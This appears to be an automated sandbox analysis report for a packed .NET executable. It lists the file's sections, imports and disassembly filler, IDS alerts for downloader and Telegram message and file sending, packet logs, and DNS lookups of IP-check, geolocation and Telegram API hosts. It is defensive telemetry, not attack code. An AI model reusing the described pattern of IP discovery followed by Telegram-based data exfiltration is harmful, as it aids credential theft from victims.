add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
adc byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax+00000018h], al
push eax
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5f32	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb6000	0x640	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb490c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb3fcc	0xb4000	99037123b410f4da7a2250a9696cd430	False	0.9164374457465277	data	7.777672430186149	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb6000	0x640	0x800	4720de8e271deceb73ab38b6ce0cc146	False	0.3408203125	data	3.5172053457749257	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x200	7846983edb78353edbb4a400f0e25ff8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb6090	0x3b0	data			0.4184322033898305
RT_MANIFEST	0xb6450	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T19:11:13.672206+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49740	193.122.130.0	80	TCP
2025-01-09T19:11:14.773624+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49740	193.122.130.0	80	TCP
2025-01-09T19:11:15.674977+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49752	104.21.96.1	443	TCP
2025-01-09T19:11:16.469103+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49759	193.122.130.0	80	TCP
2025-01-09T19:11:17.139493+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49766	104.21.96.1	443	TCP
2025-01-09T19:11:21.397626+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49797	104.21.96.1	443	TCP
2025-01-09T19:11:27.543452+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.9	49839	149.154.167.220	443	TCP
2025-01-09T19:11:34.494484+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.9	49882	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 19:11:12.898109913 CET	49740	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:12.903131962 CET	80	49740	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:12.903232098 CET	49740	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:12.903517962 CET	49740	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:12.908344984 CET	80	49740	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:13.489903927 CET	80	49740	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:13.501991034 CET	49740	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:13.506902933 CET	80	49740	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:13.621144056 CET	80	49740	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:13.672205925 CET	49740	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:13.706289053 CET	49746	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:13.706311941 CET	443	49746	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:13.707448006 CET	49746	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:13.760165930 CET	49746	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:13.760188103 CET	443	49746	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:14.275583982 CET	443	49746	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:14.275667906 CET	49746	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:14.296984911 CET	49746	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:14.297024965 CET	443	49746	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:14.297475100 CET	443	49746	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:14.344075918 CET	49746	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:14.434199095 CET	49746	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:14.479331017 CET	443	49746	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:14.550218105 CET	443	49746	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:14.550784111 CET	443	49746	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:14.552231073 CET	49746	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:14.584908009 CET	49746	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:14.591037035 CET	49740	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:14.595895052 CET	80	49740	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:14.715017080 CET	80	49740	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:14.773623943 CET	49740	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:14.999658108 CET	49752	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:14.999715090 CET	443	49752	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:14.999795914 CET	49752	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:15.072196007 CET	49752	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:15.072221041 CET	443	49752	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:15.529150963 CET	443	49752	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:15.535490036 CET	49752	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:15.535506964 CET	443	49752	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:15.675015926 CET	443	49752	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:15.675090075 CET	443	49752	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:15.675136089 CET	49752	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:15.675647020 CET	49752	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:15.679645061 CET	49740	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:15.680907965 CET	49759	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:15.684612036 CET	80	49740	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:15.684668064 CET	49740	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:15.685715914 CET	80	49759	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:15.685796022 CET	49759	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:15.685906887 CET	49759	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:15.690665007 CET	80	49759	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:16.414019108 CET	80	49759	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:16.415345907 CET	49766	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:16.415406942 CET	443	49766	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:16.416456938 CET	49766	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:16.416707039 CET	49766	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:16.416717052 CET	443	49766	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:16.469103098 CET	49759	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:16.909452915 CET	443	49766	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:16.911020994 CET	49766	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:16.911050081 CET	443	49766	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:17.139520884 CET	443	49766	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:17.139599085 CET	443	49766	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:17.139671087 CET	49766	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:17.140090942 CET	49766	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:17.144625902 CET	49772	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:17.149594069 CET	80	49772	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:17.149677992 CET	49772	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:17.149856091 CET	49772	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:17.154635906 CET	80	49772	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:17.616458893 CET	80	49772	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:17.638465881 CET	49773	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:17.638531923 CET	443	49773	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:17.638602972 CET	49773	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:17.646624088 CET	49773	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:17.646658897 CET	443	49773	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:17.656608105 CET	49772	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:18.122185946 CET	443	49773	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:18.124066114 CET	49773	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:18.124115944 CET	443	49773	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:18.259051085 CET	443	49773	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:18.259125948 CET	443	49773	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:18.259174109 CET	49773	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:18.259738922 CET	49773	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:18.263866901 CET	49772	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:18.264955997 CET	49779	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:18.268825054 CET	80	49772	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:18.268879890 CET	49772	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:18.269737959 CET	80	49779	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:18.269803047 CET	49779	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:18.269928932 CET	49779	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:18.274749994 CET	80	49779	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:19.105428934 CET	80	49779	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:19.106631041 CET	49785	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:19.106676102 CET	443	49785	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:19.106755972 CET	49785	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:19.107038021 CET	49785	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:19.107052088 CET	443	49785	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:19.156596899 CET	49779	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:19.600888968 CET	443	49785	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:19.602452993 CET	49785	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:19.602488041 CET	443	49785	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:19.745805979 CET	443	49785	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:19.745870113 CET	443	49785	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:19.745939970 CET	49785	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:19.746514082 CET	49785	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:19.750715971 CET	49779	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:19.753408909 CET	49791	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:19.755631924 CET	80	49779	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:19.755686998 CET	49779	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:19.758207083 CET	80	49791	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:19.758341074 CET	49791	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:19.758454084 CET	49791	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:19.763159037 CET	80	49791	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:20.783092976 CET	80	49791	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:20.785414934 CET	49797	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:20.785468102 CET	443	49797	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:20.785595894 CET	49797	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:20.785887003 CET	49797	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:20.785901070 CET	443	49797	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:20.828495979 CET	49791	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:21.257353067 CET	443	49797	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:21.259337902 CET	49797	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:21.259366989 CET	443	49797	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:21.397737026 CET	443	49797	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:21.397907019 CET	443	49797	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:21.398082018 CET	49797	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:21.399336100 CET	49797	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:21.402144909 CET	49791	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:21.403546095 CET	49803	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:21.407150030 CET	80	49791	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:21.407246113 CET	49791	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:21.408368111 CET	80	49803	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:21.408443928 CET	49803	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:21.408577919 CET	49803	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:21.413372993 CET	80	49803	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:22.672903061 CET	80	49803	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:22.674262047 CET	49809	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:22.674310923 CET	443	49809	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:22.674379110 CET	49809	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:22.674597979 CET	49809	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:22.674617052 CET	443	49809	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:22.719113111 CET	49803	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:23.160868883 CET	443	49809	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:23.162564993 CET	49809	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:23.162580013 CET	443	49809	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:23.328192949 CET	443	49809	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:23.328464031 CET	443	49809	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:23.328896046 CET	49809	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:23.329210997 CET	49809	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:23.333395958 CET	49803	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:23.334568024 CET	49815	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:23.338428020 CET	80	49803	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:23.338627100 CET	49803	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:23.339421988 CET	80	49815	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:23.339570045 CET	49815	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:23.339570045 CET	49815	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:23.344412088 CET	80	49815	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:23.846915960 CET	80	49815	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:23.849452972 CET	49821	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:23.849502087 CET	443	49821	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:23.849720001 CET	49821	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:23.849941015 CET	49821	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:23.849952936 CET	443	49821	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:23.891083956 CET	49815	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:24.313033104 CET	443	49821	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:24.314743996 CET	49821	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:24.314785004 CET	443	49821	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:24.458065033 CET	443	49821	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:24.458141088 CET	443	49821	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:24.458192110 CET	49821	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:24.458657026 CET	49821	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:24.461816072 CET	49815	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:24.462970018 CET	49824	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:24.466670036 CET	80	49815	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:24.466722965 CET	49815	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:24.467735052 CET	80	49824	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:24.467801094 CET	49824	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:24.467888117 CET	49824	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:24.472585917 CET	80	49824	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:25.754412889 CET	80	49824	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:25.755814075 CET	49833	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:25.755897045 CET	443	49833	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:25.755971909 CET	49833	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:25.756264925 CET	49833	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:25.756279945 CET	443	49833	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:25.797380924 CET	49824	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:26.501765966 CET	443	49833	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:26.503777027 CET	49833	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:26.503830910 CET	443	49833	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:26.651896000 CET	443	49833	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:26.652007103 CET	443	49833	104.21.96.1	192.168.2.9
Jan 9, 2025 19:11:26.652081966 CET	49833	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:26.652642965 CET	49833	443	192.168.2.9	104.21.96.1
Jan 9, 2025 19:11:26.666532993 CET	49824	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:26.671632051 CET	80	49824	193.122.130.0	192.168.2.9
Jan 9, 2025 19:11:26.671785116 CET	49824	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:26.674983025 CET	49839	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:26.675034046 CET	443	49839	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:26.675175905 CET	49839	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:26.675508022 CET	49839	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:26.675525904 CET	443	49839	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:27.302299023 CET	443	49839	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:27.302395105 CET	49839	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:27.304438114 CET	49839	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:27.304462910 CET	443	49839	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:27.304718018 CET	443	49839	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:27.306288958 CET	49839	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:27.351327896 CET	443	49839	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:27.543483973 CET	443	49839	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:27.543555975 CET	443	49839	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:27.543598890 CET	49839	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:27.548125982 CET	49839	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:33.762440920 CET	49759	80	192.168.2.9	193.122.130.0
Jan 9, 2025 19:11:33.815335035 CET	49882	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:33.815385103 CET	443	49882	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:33.815619946 CET	49882	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:33.815726042 CET	49882	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:33.815742016 CET	443	49882	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:34.492528915 CET	443	49882	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:34.494173050 CET	49882	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:34.494194984 CET	443	49882	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:34.494394064 CET	49882	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:34.494400978 CET	443	49882	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:34.800472021 CET	443	49882	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:34.800544977 CET	443	49882	149.154.167.220	192.168.2.9
Jan 9, 2025 19:11:34.800611019 CET	49882	443	192.168.2.9	149.154.167.220
Jan 9, 2025 19:11:34.800968885 CET	49882	443	192.168.2.9	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 19:11:12.883443117 CET	49559	53	192.168.2.9	1.1.1.1
Jan 9, 2025 19:11:12.890523911 CET	53	49559	1.1.1.1	192.168.2.9
Jan 9, 2025 19:11:13.697612047 CET	49539	53	192.168.2.9	1.1.1.1
Jan 9, 2025 19:11:13.705625057 CET	53	49539	1.1.1.1	192.168.2.9
Jan 9, 2025 19:11:26.667201042 CET	54152	53	192.168.2.9	1.1.1.1
Jan 9, 2025 19:11:26.674381018 CET	53	54152	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 19:11:12.883443117 CET	192.168.2.9	1.1.1.1	0x4d8c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:13.697612047 CET	192.168.2.9	1.1.1.1	0xfa53	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:26.667201042 CET	192.168.2.9	1.1.1.1	0x23b1	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 19:11:06.794249058 CET	1.1.1.1	192.168.2.9	0xe189	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	azurefd-t-fb-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 19:11:06.794249058 CET	1.1.1.1	192.168.2.9	0xe189	No error (0)	dual.s-part-0017.t-0009.fb-t-msedge.net	s-part-0017.t-0009.fb-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 19:11:06.794249058 CET	1.1.1.1	192.168.2.9	0xe189	No error (0)	s-part-0017.t-0009.fb-t-msedge.net		13.107.253.45	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:12.890523911 CET	1.1.1.1	192.168.2.9	0x4d8c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 19:11:12.890523911 CET	1.1.1.1	192.168.2.9	0x4d8c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:12.890523911 CET	1.1.1.1	192.168.2.9	0x4d8c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:12.890523911 CET	1.1.1.1	192.168.2.9	0x4d8c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:12.890523911 CET	1.1.1.1	192.168.2.9	0x4d8c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:12.890523911 CET	1.1.1.1	192.168.2.9	0x4d8c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:13.705625057 CET	1.1.1.1	192.168.2.9	0xfa53	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:13.705625057 CET	1.1.1.1	192.168.2.9	0xfa53	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:13.705625057 CET	1.1.1.1	192.168.2.9	0xfa53	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:13.705625057 CET	1.1.1.1	192.168.2.9	0xfa53	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:13.705625057 CET	1.1.1.1	192.168.2.9	0xfa53	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:13.705625057 CET	1.1.1.1	192.168.2.9	0xfa53	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:13.705625057 CET	1.1.1.1	192.168.2.9	0xfa53	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:11:26.674381018 CET	1.1.1.1	192.168.2.9	0x23b1	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
